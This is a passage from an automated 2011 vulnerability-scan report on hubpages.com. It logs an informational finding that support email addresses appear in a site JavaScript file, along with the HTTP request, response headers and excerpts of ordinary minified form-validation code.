...[SNIP]...
<a id="badge_link" href="mailto:advertise@hubpages.com">Please direct all inquiries to advertise@hubpages.com</a>
...[SNIP]...

9.2. https://hubpages.com/s/js18621.js previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hubpages.com
Path:	/s/js18621.js

Issue detail

The following email addresses were disclosed in the response:

payments@hubpages.com
team@hubpages.com

Request

GET /s/js18621.js HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:43 GMT
Content-Type: application/x-javascript
Last-Modified: Fri, 11 Feb 2011 00:49:44 GMT
Connection: keep-alive
Expires: Mon, 21 Feb 2011 18:16:43 GMT
Cache-Control: max-age=864000
Content-Length: 437331

(function(_1,_2){
var _3=function(_4,_5){
return new _3.fn.init(_4,_5);
},_6=_1.jQuery,_$=_1.$,_8=_1.document,_9,_a=/^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/,_b=/^.[^:#\[\.,]*$/,_c=/\S/,_d=/^(\s|\u00A0)+|
...[SNIP]...
ges.com.");
}else{
if(json.status=="saved"||json.status=="no change"){
$("changesSaved").show();
}else{
alert("An unknown error has occured. Please try saving again. If the problem persists, contact team@hubpages.com");
}
}
};
hpFormHandler.prototype._showErrors=function(){
if(!this.errorDiv&&!$(this.errorId)){
new Insertion.Top(this.form,"<div id=\""+this.errorId+"\">
...[SNIP]...
=900){
if(_d25[1][0]!=7&&_d25[1][0]!=8){
_d24=true;
}
}
}
return !_d24;
},"Your SSN or ITIN appears to be invalid. It should be in the format xxx-xx-xxxx, where each x is a digit. Please contact us at payments@hubpages.com for help.");
jQuery.validator.addMethod("nohtml",function(_d27,_d28,_d29){
if(!this.depend(_d29,_d28)){
return "dependency-mismatch";
}
return _d27.search(/[<|>
...[SNIP]...
{
return "dependency-mismatch";
}
return ein.search(/^[0-9]{2}\-[0-9]{7}$/)!=-1;
},"Your EIN appears to be invalid. It should be in the format xx-xxxxxxx, where each x is a digit. Please contact us at payments@hubpages.com for help.");
(function($){
$.fn.ajaxSubmit=function(_d2e){
if(!this.length){
log("ajaxSubmit: skipping submit process - no element selected");
return this;
}
if(typeof _d2e=="function"){
_d2e={success
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Sun Feb 13 08:02:05 CST 2011.